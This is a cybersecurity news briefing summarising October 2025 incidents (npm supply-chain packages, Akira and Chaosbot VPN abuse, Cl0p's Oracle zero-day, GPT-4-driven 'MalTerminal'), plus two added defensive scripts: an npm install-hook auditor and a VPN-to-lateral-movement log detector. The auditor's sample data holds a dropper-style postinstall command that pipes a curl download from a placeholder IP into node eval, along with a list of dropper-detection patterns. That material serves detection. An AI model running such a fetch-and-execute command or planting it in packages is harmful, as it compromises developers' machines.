Critical Flaws in Oracle & Redis Under Active Threat; Widespread Supply Chain Attacks Target Developers and Cloud Services
Summary
This intelligence briefing for October 11, 2025, covers a series of critical cybersecurity incidents. Major themes include the active exploitation of a zero-day in Oracle E-Business Suite by the Cl0p ransomware group and the patching of a 13-year-old RCE flaw in Redis. Supply chain attacks remain a dominant threat, with malicious npm and Node.js packages targeting developers, and a Discord breach originating from a third-party vendor. SonicWall disclosed two major incidents: active exploitation of its VPNs by Akira ransomware and a full-scale breach of its Cloud Backup service affecting all customers. Additionally, new malware strains like 'Chaosbot' and the AI-powered 'MalTerminal' demonstrate evolving attacker TTPs.
Today's New Articles
Discord Breach Exposes 5.5M Users via Third-Party Vendor Compromise
Discord has officially confirmed a data breach that originated from a compromised third-party customer support vendor, Zendesk. The incident exposed the data of users who had interacted with Discord's support channels. Hackers claim to have exfiltrated informa...
175 Malicious NPM Packages Target Developers in Widespread Phishing Attack
A significant software supply chain attack has been identified on the npm open-source repository, where researchers discovered 175 malicious packages that were downloaded approximately 26,000 times. These packages were trojanized to execute credential phishing...
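One check a developer or build engineer can run after a story like this is to audit the installed dependency tree for lifecycle hooks, since a package that declares preinstall/install/postinstall scripts runs code automatically on `npm install`. The script below is an added example written for this briefing, not code from the researchers or from npm: it walks every package.json under a node_modules directory, reports packages that declare install-time hooks, and tags script bodies that contain dropper-style indicators (downloaders, inline `node -e`, `eval`, base64, raw-IP URLs). The three package manifests it audits are constructed sample data; the package names, versions and script bodies are hypothetical and do not refer to any real npm package.

```python
"""Audit an npm dependency tree for install-time lifecycle hooks.

Added example for this briefing (not from the original article). Flags any
package whose package.json declares preinstall/install/postinstall scripts and
tags script bodies that match patterns common in droppers. The sample tree it
builds is constructed test data with hypothetical package names.
"""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Indicators that are rare in honest build steps and common in install-time droppers.
SUSPICIOUS = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "inline-node": re.compile(r"\bnode\s+-e\b"),
    "eval": re.compile(r"\beval\s*\("),
    "base64": re.compile(r"base64", re.IGNORECASE),
    "raw-ip-url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
}


def audit_manifest(manifest):
    """Return one finding per lifecycle hook declared in a package.json dict."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        body = scripts.get(hook)
        if not body:
            continue
        indicators = sorted(k for k, pat in SUSPICIOUS.items() if pat.search(body))
        findings.append({"hook": hook, "script": body, "indicators": indicators})
    return findings


def audit_tree(root):
    """Walk node_modules under root; map package name -> findings for packages with hooks."""
    results = {}
    for pj in Path(root).rglob("package.json"):
        try:
            manifest = json.loads(pj.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the audit
        name = manifest.get("name") or pj.parent.name
        findings = audit_manifest(manifest)
        if findings:
            results[name] = findings
    return results


# Constructed sample manifests (hypothetical names): one with no hooks, one with a
# legitimate-looking native build hook, one with a dropper-style postinstall.
SAMPLE_PACKAGES = {
    "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0",
                     "scripts": {"test": "node test.js"}},
    "native-helper": {"name": "native-helper", "version": "2.1.0",
                      "scripts": {"install": "node-gyp rebuild"}},
    "colorz-utils": {"name": "colorz-utils", "version": "0.0.3",
                     "scripts": {"postinstall":
                                 "curl -s http://203.0.113.9/x | node -e "
                                 "\"eval(require('fs').readFileSync(0,'utf8'))\""}},
}


def write_sample_tree(root):
    """Materialise SAMPLE_PACKAGES as root/node_modules/<name>/package.json."""
    for name, manifest in SAMPLE_PACKAGES.items():
        pkg_dir = Path(root) / "node_modules" / name
        pkg_dir.mkdir(parents=True, exist_ok=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")


def demo():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_tree(tmp)
        return audit_tree(tmp)


if __name__ == "__main__":
    for pkg, findings in demo().items():
        for f in findings:
            print(f"{pkg}: {f['hook']} -> {f['indicators'] or 'hook only'}")
```

A hook with no indicators (the `node-gyp rebuild` case) is not proof of anything and still deserves a look, since many real droppers hide behind an innocuous-looking hook that loads a second file. For CI runners and developer machines that never need native builds, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) removes the install-time execution vector entirely.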
New 'Chaosbot' Malware Weaponizes Cisco VPN & AD Credentials for Lateral Movement
A new malware strain named "Chaosbot" has been discovered by security researchers. It specializes in using stolen Cisco VPN and Active Directory credentials to execute commands and move laterally within compromised corporate networks. By leveraging legitimate...
Akira Ransomware Gang Actively Exploiting SonicWall VPNs for Network Breaches
The Akira ransomware group is actively exploiting vulnerabilities in SonicWall SSL VPN devices to gain initial access to corporate networks. By targeting these widely used, internet-facing appliances, the threat actors can establish a foothold, move laterally,...
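Both the Chaosbot and Akira items above share a TTP: a valid VPN login with stolen credentials, followed quickly by authentication to many internal hosts. A detection that fits that pattern correlates VPN session-start events with Windows 4624 network logons (LogonType 3) for the same account inside a short window and raises the severity when the VPN source address is not one the account has used before. The script below is an added example written for this briefing, not detection content from SonicWall, Cisco or the researchers who reported either malware. The log lines are constructed and deliberately flattened to one line per event (real ASA syslog and 4624 records carry many more fields); the user names, hosts, IP addresses and the thresholds are assumptions.

```python
"""Correlate VPN logins with network-logon fan-out to flag credential-driven lateral movement.

Added example for this briefing (not vendor or researcher code). Input is a list of
constructed, flattened log lines: VPN session starts and Windows 4624 LogonType=3
events. An alert fires when one account authenticates to host_threshold or more
distinct hosts within `window` of a VPN login; severity is "high" when the VPN
source IP is absent from that account's baseline.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed line formats (assumed); adapt the regexes to the real collector output.
VPN_RE = re.compile(
    r"^(?P<ts>\S+) vpn\S* user=(?P<user>\S+) src=(?P<src>\S+) action=session_start$")
LOGON_RE = re.compile(
    r"^(?P<ts>\S+) (?P<dc>\S+) EventID=4624 LogonType=3 "
    r"TargetUserName=(?P<user>\S+) WorkstationName=(?P<host>\S+)$")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse(line):
    """Normalise one line into a dict, or None if it is not an event we care about."""
    m = VPN_RE.match(line)
    if m:
        return {"kind": "vpn", "ts": _ts(m["ts"]), "user": m["user"].lower(), "src": m["src"]}
    m = LOGON_RE.match(line)
    if m:
        return {"kind": "logon", "ts": _ts(m["ts"]), "user": m["user"].lower(),
                "host": m["host"].upper()}
    return None


def detect(lines, baseline_src, window=timedelta(minutes=30), host_threshold=4):
    """Return alerts for VPN logins followed by wide network-logon fan-out."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    logons = defaultdict(list)
    for e in events:
        if e["kind"] == "logon":
            logons[e["user"]].append(e)
    alerts = []
    for e in events:
        if e["kind"] != "vpn":
            continue
        hosts = {l["host"] for l in logons[e["user"]]
                 if e["ts"] <= l["ts"] <= e["ts"] + window}
        if len(hosts) < host_threshold:
            continue
        new_src = e["src"] not in baseline_src.get(e["user"], set())
        alerts.append({"user": e["user"], "src": e["src"],
                       "vpn_login": e["ts"].isoformat(), "hosts": sorted(hosts),
                       "severity": "high" if new_src else "medium"})
    return alerts


# Constructed baseline: source IPs each account has used for VPN before (assumed).
BASELINE_SRC = {
    "jdoe": {"203.0.113.5"},
    "asmith": {"203.0.113.77"},
    "bwong": {"198.51.100.200"},
}

# Constructed sample log (not real traffic). jdoe: unknown source + fan-out; asmith:
# known source, one host; bwong: known source but fan-out to four hosts.
SAMPLE_LOG = [
    "2025-10-10T02:14:07Z vpn-asa01 user=jdoe src=198.51.100.24 action=session_start",
    "2025-10-10T02:16:40Z dc01 EventID=4624 LogonType=3 TargetUserName=jdoe WorkstationName=HR-FS01",
    "2025-10-10T02:18:02Z dc01 EventID=4624 LogonType=3 TargetUserName=jdoe WorkstationName=FIN-DB02",
    "2025-10-10T02:19:55Z dc01 EventID=4624 LogonType=3 TargetUserName=jdoe WorkstationName=DC01",
    "2025-10-10T02:23:11Z dc01 EventID=4624 LogonType=3 TargetUserName=jdoe WorkstationName=IT-JUMP01",
    "2025-10-10T09:01:30Z vpn-asa01 user=asmith src=203.0.113.77 action=session_start",
    "2025-10-10T09:05:12Z dc01 EventID=4624 LogonType=3 TargetUserName=asmith WorkstationName=ENG-FS03",
    "2025-10-10T11:05:00Z vpn-asa01 user=bwong src=198.51.100.200 action=session_start",
    "2025-10-10T11:06:10Z dc02 EventID=4624 LogonType=3 TargetUserName=bwong WorkstationName=SQL01",
    "2025-10-10T11:07:45Z dc02 EventID=4624 LogonType=3 TargetUserName=bwong WorkstationName=SQL02",
    "2025-10-10T11:09:20Z dc02 EventID=4624 LogonType=3 TargetUserName=bwong WorkstationName=BACKUP01",
    "2025-10-10T11:12:33Z dc02 EventID=4624 LogonType=3 TargetUserName=bwong WorkstationName=DC02",
    "2025-10-10T13:40:00Z dc02 EventID=4624 LogonType=3 TargetUserName=bwong WorkstationName=FAR-OUTSIDE-WINDOW",
]


def demo():
    return detect(SAMPLE_LOG, BASELINE_SRC)


if __name__ == "__main__":
    for a in demo():
        print(f"[{a['severity']}] {a['user']} from {a['src']} -> {', '.join(a['hosts'])}")
```

The baseline keeps the rule from firing on an administrator working from a known address, while the fan-out threshold alone still catches reuse of an admin's credentials from that same address. Tune `host_threshold` against your own logon data: helpdesk and backup accounts legitimately touch many hosts and belong on an allow-list rather than in the baseline.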
New 'Stealit' Malware Targets Developers via Malicious Node.js Extensions
A new information-stealing malware named "Stealit" is targeting Windows systems by using malicious Node.js extensions as its infection vector. This novel approach specifically targets software developers, aiming to steal sensitive data such as source code, API...
'MalTerminal' Malware Uses OpenAI's GPT-4 to Auto-Generate Ransomware Code
Researchers have discovered "MalTerminal," a novel malware that uses OpenAI's GPT-4 large language model (LLM) to dynamically generate ransomware code. This represents a significant and dangerous evolution in malware development, enabling the creation of polym...
Juniper Networks Patches 220 Flaws, Including Nine Critical Bugs Dating Back Years
Juniper Networks has released a massive security update for October 2025, addressing a total of 220 vulnerabilities across its broad portfolio of networking products. The patch bundle includes fixes for nine flaws rated as critical, posing a severe risk of rem...
Article Updates
Cl0p Ransomware Exploits Oracle E-Business Suite Zero-Day in Mass Attack
Update: New reports confirm Cl0p has sent ransom demands to Oracle E-Business Suite customers, indicating widespread compromise prior to the patch release. Evidence suggests exploitation may have been active since July 2025, earlier than initially reported. Organizati...